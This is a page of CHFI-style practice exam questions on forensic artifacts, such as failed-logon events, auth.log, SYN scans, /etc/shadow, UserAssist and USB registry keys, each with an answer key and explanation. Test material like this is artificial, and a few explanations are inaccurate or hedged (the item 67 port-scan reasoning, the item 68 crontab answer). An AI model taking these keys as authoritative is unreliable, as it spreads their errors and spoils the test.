Cron jobs, SSH authorized_keys, and systemd services are common methods used by attackers to maintain persistence on Linux. /etc/passwd is for user accounts, not persistence. .bashrc runs for interactive shells, but it is less common for persistence.

65
MCQeasy

A security analyst reviews Windows Event Logs and sees Event ID 4625 multiple times for a single user account from a remote IP address within a short time frame. What is the MOST likely interpretation?

A.The user successfully logged on from multiple locations
B.An attacker is attempting to brute-force the user's password
C.The system is experiencing a denial-of-service attack
D.A service installed itself on the system
AnswerB

Multiple failed logon attempts from a single IP indicate a brute-force attack.

Why this answer

Event ID 4625 indicates a failed logon attempt. Multiple occurrences from the same remote IP suggest a brute-force password guessing attack.

66
MCQeasy

Which Linux log file is the primary source for authentication-related events, including SSH login attempts and sudo usage?

A./var/log/kern.log
B./var/log/syslog
C./var/log/auth.log
D./var/log/messages
AnswerC

Correct: auth.log is dedicated to authentication logs.

Why this answer

On most Linux distributions, authentication events are logged to /var/log/auth.log (or /var/log/secure on RHEL-based systems).

67
MCQmedium

A network analyst captures suspicious traffic and uses Wireshark to examine packets. The analyst notices many TCP SYN packets sent to various ports on a single host with no SYN-ACK replies. What type of activity is MOST likely observed?

A.Denial of Service (DoS) attack
B.Port scan
C.DNS amplification
D.ARP poisoning
AnswerB

SYN packets to multiple ports are characteristic of a TCP SYN scan.

Why this answer

A port scan sends SYN packets to multiple ports to identify open ones; lack of SYN-ACK replies indicates closed ports.

68
MCQmedium

A forensic analyst is examining a compromised Linux server and finds a suspicious binary running as a service. Which file should be checked to determine if the binary is set to start at boot?

A./etc/crontab
B./etc/shadow
C./var/log/auth.log
D./etc/passwd
AnswerA

Crontab files can be used to run tasks at boot (e.g., @reboot).

Why this answer

Cron jobs are used for scheduling tasks; a cron job could be set to run a binary at boot. However, init scripts or systemd services are more common for services. Among the options, crontabs are the most direct for persistence, but the question asks for 'file' from the list. /etc/crontab defines system-wide cron jobs.

69
MCQmedium

During a forensic analysis of a compromised Linux server, you notice that the file /var/log/auth.log has been cleared. However, you find that the attacker's commands are still partially recoverable. Which artifact most likely contains the attacker's command history?

A./var/log/syslog
B.~/.bash_history
C./proc/1/cmdline
D./etc/shadow
AnswerB

This file logs commands entered in bash.

Why this answer

The bash_history file for each user (typically ~/.bash_history) stores command-line history. Even if auth.log is cleared, this file often retains command entries.

70
MCQeasy

In Linux, which file contains hashed user passwords?

A./etc/gshadow
B./etc/group
C./etc/passwd
D./etc/shadow
AnswerD

Correct. /etc/shadow holds the password hashes.

Why this answer

The /etc/shadow file stores hashed user passwords along with password aging information, and is readable only by root to enhance security. In contrast, /etc/passwd contains user account information but stores only a placeholder (usually 'x' or '*') for the password hash, not the hash itself. This separation is a standard Linux security mechanism to prevent unauthorized access to password hashes.

Exam trap

EC-Council often tests the misconception that /etc/passwd still contains password hashes, leading candidates to choose option C, but modern Linux systems have moved hashes to /etc/shadow for security.

How to eliminate wrong answers

Option A is wrong because /etc/gshadow stores hashed group passwords and group administrator information, not user passwords. Option B is wrong because /etc/group defines group memberships and optionally group passwords (often stored as 'x' with hashes in /etc/gshadow), not user password hashes. Option C is wrong because /etc/passwd historically stored password hashes, but modern Linux systems use shadow passwords, and /etc/passwd now contains only a placeholder (e.g., 'x') indicating the hash is in /etc/shadow.

71
MCQmedium

During a Windows forensic investigation, an analyst finds a registry key under NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count. What type of artifact is this, and what information does it typically contain?

A.UserAssist entries that record program execution history with counts and timestamps
B.Jump list data from the taskbar showing recently opened files
C.Prefetch file metadata indicating application launch times
D.ShellBags data displaying folder view settings and sizes
AnswerA

UserAssist is designed to log program launches by the user, including the number of times run and last execution.

Why this answer

UserAssist keys track programs launched via Windows Explorer, recording the executable path, last execution time, and run count. This is a common artifact for determining application usage.

72
MCQhard

A network forensic analyst examines a pcap file in Wireshark and sees an HTTP POST request to '/shell.jsp' with a parameter 'cmd' containing 'dir'. The response contains a directory listing. Which intrusion artifact is indicated?

A.SQL injection
B.Directory traversal
C.Webshell
D.Cross-site scripting (XSS)
AnswerC

A webshell allows remote command execution via web requests, evidenced by cmd parameter and directory listing.

Why this answer

A webshell is a malicious script that provides remote command execution via web requests. The POST to a JSP file with a cmd parameter and directory listing in the response indicates a webshell.

73
MCQhard

A forensic analyst is examining a Windows system and finds that the UserAssist key in the NTUSER.DAT hive contains entries with Rot13-encoded names. What is the primary purpose of the UserAssist key?

A.Record USB device connection history
B.Store user password history
C.Log program execution counts and last run times
D.Track recently opened documents via Jump Lists
AnswerC

UserAssist tracks how often and when programs were run.

Why this answer

UserAssist tracks application execution count and last run time. The Rot13 obfuscation is to hide the names from casual viewing.

74
MCQeasy

Which tool is specifically designed for timeline analysis of forensic artifacts across multiple systems and can process output from various forensic tools?

A.Autopsy
B.Wireshark
C.Sleuth Kit
D.log2timeline
AnswerD

log2timeline (Plaso) is used for timeline generation and analysis in digital forensics.

Why this answer

log2timeline (Plaso) is a tool for creating super timelines from multiple log and artifact sources, enabling analysis of events across time.

75
Multi-Selectmedium

An investigator is analyzing a Windows system and wants to find evidence of USB device usage. Which TWO registry keys should be examined? (Select TWO.)

Select 2 answers
A.HKLM\SAM\SAM
B.HKCU\Software\Microsoft\Windows\CurrentVersion\Run
C.HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
D.HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
E.HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
AnswersC, D

Lists all USB storage devices ever connected.

Why this answer

USBSTOR stores connected USB devices; MountPoints2 stores volume mount points with device identifiers.

Page 1 of 3 · 216 questions totalNext →

Ready to test yourself?

Try a timed practice session using only Chfi Os Network questions.